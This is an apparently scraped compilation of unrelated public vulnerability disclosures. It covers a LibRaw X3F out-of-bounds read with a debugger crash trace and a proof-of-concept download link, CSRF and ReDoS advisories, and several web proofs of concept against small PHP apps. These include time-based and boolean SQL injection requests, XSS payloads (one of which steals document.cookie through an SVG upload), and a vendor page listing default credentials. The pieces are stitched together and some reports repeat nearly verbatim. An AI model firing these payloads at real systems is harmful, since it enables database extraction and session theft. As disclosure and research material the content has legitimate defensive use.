In LibRaw, an out-of-bounds read vulnerability exists within the get_huffman_diff() function (libraw\src\x3f\x3f_utils_patched.cpp) when reading data from an image file.

**Description**

An out-of-bounds read vulnerability exists within the "get\_huffman\_diff()" function (libraw\\src\\x3f\\x3f\_utils\_patched.cpp) when parsing a crafted X3F file.

**Steps to Reproduce**

(poc archive password= girlelecta):  
https://drive.google.com/file/d/1Yhqo6idPqWMisvPKrlzjsUKRApHmz2M\_/view

cmd:  
magick.exe convert poc1.X3F new.png

Upon running this, following crash happens (Note: I enabled page heap on magick.exe):

Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\magick.exe convert E:\\Workspace\\poc1.X3F E:\\Workspace\\new.png

\*\*\*\*\*\*\*\*\*\*\*\*\* Path validation summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*  
Symbol search path is: srv\*  
Executable search path is:  
ModLoad: 00007ff6 5a870000 00007ff6 5a882000 magick.exe  
ModLoad: 00007ffe c1500000 00007ffe c16f0000 ntdll.dll  
ModLoad: 00007ffe a8a10000 00007ffe a8a81000 C:\\WINDOWS\\System32\\verifier.dll  
Page heap: pid 0x2264: page heap enabled with flags 0x3.  
ModLoad: 00007ffe bf9a0000 00007ffe bfa52000 C:\\WINDOWS\\System32\\KERNEL32.DLL  
ModLoad: 00007ffe be510000 00007ffe be7b3000 C:\\WINDOWS\\System32\\KERNELBASE.dll  
ModLoad: 00007ffe 82020000 00007ffe 822a9000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
ModLoad: 00007ffe c0ea0000 00007ffe c1034000 C:\\WINDOWS\\System32\\USER32.dll  
ModLoad: 00007ffe 92500000 00007ffe 926c9000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
ModLoad: 00007ffe bf580000 00007ffe bf5a1000 C:\\WINDOWS\\System32\\win32u.dll  
ModLoad: 00007ffe c0910000 00007ffe c0936000 C:\\WINDOWS\\System32\\GDI32.dll  
ModLoad: 00007ffe be7c0000 00007ffe be954000 C:\\WINDOWS\\System32\\gdi32full.dll  
ModLoad: 00007ffe a8d20000 00007ffe a8d42000 C:\\WINDOWS\\SYSTEM32\\VCRUNTIME140D.dll  
ModLoad: 00007ffe 8b440000 00007ffe 8b5fb000 C:\\WINDOWS\\SYSTEM32\\ucrtbased.dll  
ModLoad: 00007ffe beab0000 00007ffe beb4e000 C:\\WINDOWS\\System32\\msvcp\_win.dll  
ModLoad: 00007ffe beb80000 00007ffe bec7a000 C:\\WINDOWS\\System32\\ucrtbase.dll  
ModLoad: 00007ffe c1280000 00007ffe c1323000 C:\\WINDOWS\\System32\\ADVAPI32.dll  
ModLoad: 00007ffe c0bb0000 00007ffe c0c4e000 C:\\WINDOWS\\System32\\msvcrt.dll  
ModLoad: 00007ffe c0cc0000 00007ffe c0d57000 C:\\WINDOWS\\System32\\sechost.dll  
ModLoad: 00007ffe c02a0000 00007ffe c03c0000 C:\\WINDOWS\\System32\\RPCRT4.dll  
ModLoad: 00007ffe a88b0000 00007ffe a88d7000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_bzlib\_.dll  
ModLoad: 00007ffe a8220000 00007ffe a833f000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_freetype\_.dll  
ModLoad: 00007ffe a8190000 00007ffe a8216000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_lcms\_.dll  
ModLoad: 00007ffe a7a50000 00007ffe a7af0000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libxml\_.dll  
ModLoad: 00007ffe a87f0000 00007ffe a881a000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_zlib\_.dll  
ModLoad: 00007ffe a87c0000 00007ffe a87e3000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_lqr\_.dll  
ModLoad: 00007ffe 81ce0000 00007ffe 8201b000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_glib\_.dll  
ModLoad: 00007ffe bfa60000 00007ffe c0145000 C:\\WINDOWS\\System32\\SHELL32.dll  
ModLoad: 00007ffe bf530000 00007ffe bf57a000 C:\\WINDOWS\\System32\\cfgmgr32.dll  
ModLoad: 00007ffe c0b00000 00007ffe c0ba9000 C:\\WINDOWS\\System32\\shcore.dll  
ModLoad: 00007ffe bf5b0000 00007ffe bf8e6000 C:\\WINDOWS\\System32\\combase.dll  
ModLoad: 00007ffe be490000 00007ffe be510000 C:\\WINDOWS\\System32\\bcryptPrimitives.dll  
ModLoad: 00007ffe bec80000 00007ffe bf3ff000 C:\\WINDOWS\\System32\\windows.storage.dll  
ModLoad: 00007ffe c1430000 00007ffe c149f000 C:\\WINDOWS\\System32\\WS2\_32.dll  
ModLoad: 00007ffe be470000 00007ffe be48f000 C:\\WINDOWS\\System32\\profapi.dll  
ModLoad: 00007ffe be400000 00007ffe be44a000 C:\\WINDOWS\\System32\\powrprof.dll  
ModLoad: 00007ffe be3d0000 00007ffe be3e0000 C:\\WINDOWS\\System32\\UMPDC.dll  
ModLoad: 00007ffe c1220000 00007ffe c1272000 C:\\WINDOWS\\System32\\shlwapi.dll  
ModLoad: 00007ffe be3e0000 00007ffe be3f1000 C:\\WINDOWS\\System32\\kernel.appcore.dll  
ModLoad: 00007ffe bf510000 00007ffe bf527000 C:\\WINDOWS\\System32\\cryptsp.dll  
ModLoad: 00007ffe c1040000 00007ffe c1196000 C:\\WINDOWS\\System32\\ole32.dll  
ModLoad: 00007ffe bd950000 00007ffe bd98a000 C:\\WINDOWS\\SYSTEM32\\IPHLPAPI.DLL  
ModLoad: 00007ffe bd990000 00007ffe bda5a000 C:\\WINDOWS\\SYSTEM32\\DNSAPI.dll  
ModLoad: 00007ffe c0220000 00007ffe c0228000 C:\\WINDOWS\\System32\\NSI.dll  
(2264.3f58): Break instruction exception - code 80000003 (first chance)  
ntdll!LdrpDoDebuggerBreak+0x30:  
00007ffe c15d121c cc int 3  
0:000> g  
ModLoad: 00007ffe c1400000 00007ffe c142e000 C:\\WINDOWS\\System32\\IMM32.DLL  
ModLoad: 00007ffe b4720000 00007ffe b472f000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
ModLoad: 00007ffe 81b30000 00007ffe 81cdb000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
ModLoad: 00007ffe 9a850000 00007ffe 9a946000 C:\\WINDOWS\\SYSTEM32\\MSVCP140D.dll  
(2264.3f58): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
CORE\_DB\_libraw\_!get\_bit+0x34:  
00007ffe 81c20bb4 0fb600 movzx eax,byte ptr \[rax\] ds:0000014b bf836da4=??  
0:000> k  
Child-SP RetAddr Call Site  
00 00000038 853e32a0 00007ffe 81c219fe CORE\_DB\_libraw\_!get\_bit+0x34 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 857\]  
01 00000038 853e32c0 00007ffe 81c2251a CORE\_DB\_libraw\_!get\_huffman\_diff+0x6e \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1017\]  
02 00000038 853e3320 00007ffe 81c22352 CORE\_DB\_libraw\_!huffman\_decode\_row+0x13a \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1055\]  
03 00000038 853e33f0 00007ffe 81c37cee CORE\_DB\_libraw\_!huffman\_decode+0xb2 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1095\]  
04 00000038 853e3470 00007ffe 81c37a93 CORE\_DB\_libraw\_!x3f\_load\_huffman\_compressed+0x21e \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1411\]  
05 00000038 853e34e0 00007ffe 81c37ecd CORE\_DB\_libraw\_!x3f\_load\_huffman+0x283 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1468\]  
06 00000038 853e3550 00007ffe 81c37768 CORE\_DB\_libraw\_!x3f\_load\_image+0x12d \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1514\]  
07 00000038 853e35b0 00007ffe 81c38504 CORE\_DB\_libraw\_!x3f\_load\_data+0x88 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 2059\]  
08 00000038 853e35f0 00007ffe 81c33628 CORE\_DB\_libraw\_!LibRaw::x3f\_load\_raw+0x64 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_parse\_process.cpp @ 579\]  
09 00000038 853e36e0 00007ffe 81c3d358 CORE\_DB\_libraw\_!LibRaw::unpack+0xc18 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\decoders\\unpack.cpp @ 283\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
0a 00000038 853e38a0 00007ffe b4721989 CORE\_DB\_libraw\_!libraw\_unpack+0x48 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\libraw\_c\_api.cpp @ 136\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
0b 00000038 853e38e0 00007ffe 820783b7 IM\_MOD\_DB\_DNG\_!ReadDNGImage+0x479 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\coders\\dng.c @ 425\]  
0c 00000038 853e59f0 00007ffe 82079af3 CORE\_DB\_MagickCore\_!ReadImage+0x5e7 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickcore\\constitute.c @ 553\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
0d 00000038 853eac10 00007ffe 9253aac3 CORE\_DB\_MagickCore\_!ReadImages+0x393 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickcore\\constitute.c @ 927\]  
0e 00000038 853ebcc0 00007ffe 925d3fe8 CORE\_DB\_MagickWand\_!ConvertImageCommand+0x1523 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickwand\\convert.c @ 606\]  
\*\*\* WARNING: Unable to verify checksum for magick.exe  
0f 00000038 853ed810 00007ff6 5a8714ea CORE\_DB\_MagickWand\_!MagickCommandGenesis+0x338 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickwand\\mogrify.c @ 185\]  
10 00000038 853ee980 00007ff6 5a871693 magick!MagickMain+0x4ea \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\utilities\\magick.c @ 149\]  
11 00000038 853efbf0 00007ff6 5a871f24 magick!wmain+0x43 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\utilities\\magick.c @ 195\]  
12 00000038 853efc30 00007ff6 5a871e37 magick!invoke\_main+0x34 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 80\]  
13 00000038 853efc70 00007ff6 5a871cfe magick!\_\_scrt\_common\_main\_seh+0x127 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 253\]  
14 00000038 853efcd0 00007ff6 5a871f39 magick!\_\_scrt\_common\_main+0xe \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 296\]  
15 00000038 853efd00 00007ffe bf9b7bd4 magick!wmainCRTStartup+0x9 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_wmain.cpp @ 17\]  
16 00000038 853efd30 00007ffe c156ced1 KERNEL32!BaseThreadInitThunk+0x14  
17 00000038 853efd60 00000000 00000000 ntdll!RtlUserThreadStart+0x21

**System Configuration**

*   ImageMagick:  
    Version: ImageMagick-7.0.9-Q16 https://imagemagick.org  
    License: https://imagemagick.org/script/license.php
*   Environment (Operating system, version and so on):  
    Distributor ID: Microsoft Windows  
    Description: Windows 10

CVE-2020-35531: LibRaw "get_huffman_diff()" Out-of-bounds read vulnerability · Issue #270 · LibRaw/LibRaw

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Simon Ward MP3 jPlayer plugin <= 2.7.3 at WordPress.

CVE-2022-36373: MP3-jPlayer

Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

    # Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

Doctor's Appointment System 1.0 SQL Injection

Doctor's Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.

    # Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36203POC:POST /register.php HTTP/1.1Host: localhostusername=a"><script>alert(1337)</script>&password=123

Doctor's Appointment System 1.0 Cross Site Scripting

Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 8.9.3.

**Description**

I found XSS in the file upload function of the message function.

**Proof of Concept****Step**

1.First, access the latest version of the demo environment. "Https://www.rosariosis.org/demonstration/index.php"

2.Then log in with your student account. Student: username and password “student“

3.After logging in, access "MESSAGING > Write" from the menu on the left. (/demonstration/Modules.php?modname=Messaging/Write.php)

4.Then enter the title and message as appropriate.

5.Now upload the SVG file containing XSS to "File Attached".

6.Finally, select "Teach Teacher" as the destination and send.

7.Log in from here with your teacher's account. Teacher: username and password “teacher“

8.After logging in, access "MESSAGING > Messages" from the menu and select the message you just sent.

9.Then click on the last attached file and a pop-up screen will appear.

**Summary**

\-Endpoint: POST /demonstration/Modules.php?modname=Messaging/Write.php&search_modfunc=list&recipients_key=staff_id&subject=<title>&message=<message>&recipients_ids[0]=2&send=Send

\-Attachment: SVG file

\-Test Payload: <script type="text/javascript">alert(document.cookie)</script>

**Impact**

This vulnerability can steal a user's cookie.

**References**

*   https://owasp.org/www-community/vulnerabilities/Unrestricted\_File\_Upload
*   https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

CVE-2022-3072: Cross-site Scripting (XSS) - Stored in rosariosis

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/categories/view\_category.php

Vulnerability location: /tss/admin/categories/view\_category.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/categories/view\_category.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/categories/view\_category.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36676: bug_report/SQLi-1.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/view_schedule.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/view\_schedule.php

Vulnerability location: /tss/admin/schedules/view\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/view\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/view\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36674: bug_report/SQLi-3.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/manage_schedule.php.

Permalink

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/manage\_schedule.php

Vulnerability location: /tss/admin/schedules/manage\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/manage\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/manage\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36675: bug_report/SQLi-2.md at main · Nujabe4/bug_report

### Impact
Possible ReDoS with lib input of `{{` and with many repetitions of `{{|`.

### Patches
Patched in all versions above `0.2.5`

### Workarounds
No known work arounds.

### References
- OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS)
- Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).
- Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).
- James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).
- Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).
- Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).




**Polynomial regular expression used on uncontrolled data in nitrado.js**

High severity GitHub Reviewed Published Aug 31, 2022 in cainthebest/nitrado.js • Updated Aug 31, 2022

GHSA-vqc4-v8hc-h2jg: Polynomial regular expression used on uncontrolled data in nitrado.js

Doctor's Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) via the admin panel. In addition, it leads to takeover the administrator account by stealing the cookie via XSS.

Submitted by hshnudr on Wednesday, June 8, 2022 - 10:13.

(Updated)

This project helps a certain medical establishment such as a clinic or a hospital clients/patients to request an appointment with a doctor online. This project can also help doctors to manage the schedules of their appointments with their patients. This doctor's appointment system will organize the schedules of each patient's appointment, which will be submitted as a request to the doctor they have selected. The system has 3 sides which are the administrator, the doctor, and the patient. The system admin will populate the list of the doctors with their specialties and along with the doctor's details and system credentials. The patients will browse the doctor's appointment system website to find a doctor that has the specialty of their needs. The patient can check the doctor's weekly schedule to help them to choose the day and time which they can comply for the appointment and they will submit their request for an appointment. After that, the doctors can view all their appointments and the appointment request of the patients for their availability.

****Admin's Side****

*   **Admin can add doctors, edit doctors, delete doctors;**
    
*   **Schedule new doctors sessions, remove sessions;**
    
*   **View patient details;**
    
*   **View booking of patients;**
    

****Doctor's Side****

*   **View their Appointment;**
*   **view their scheduled sessions;**
*   **view details of patients;**
*   **delete account;**
*   **edit account settings;**

**Patient's Side**

*   **create accounts themselves;**
*   **view their old booking;**
*   **delete account;**
*   **edit account settings;**

****HOW TO GET STARTED?****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** naming ****edoc****.
6.  **Import** the provided ****SQL**** file. The file is known as ****SQL\_Database\_edoc.sql**** located inside the **source code root** folder.
7.  **Browse** the **Doctor's Appointment System** in a **browser**. i.e. ****http://localhost/edoc-echanneling-main/****.

**DEFAULT USER ACCOUNTS OF THIS PROJECT******ADMIN****

Email: **\[email protected\]**  
Password: **123**

****Doctor****

Email: **\[email protected\]**  
Password: **123**

****Patient****

Email: **\[email protected\]**  
Password: **123**

**DEMO VIDEO**

****The Project was developed using the following:****

Apache Version: 2.4.39

PHP Version: 7.3.5

Server Software: Apache/2.4.39 (Win64) PHP/7.3.5

MySQL Version: 5.7.26

Web developer: Hashen Udara https://github.com/HashenUdara/

HashenUdara/edoc-doctor-appointment-system: Simple web project that made for e-channeling. (github.com)

****More Snapshots:****

*   3074 views

Tag

#php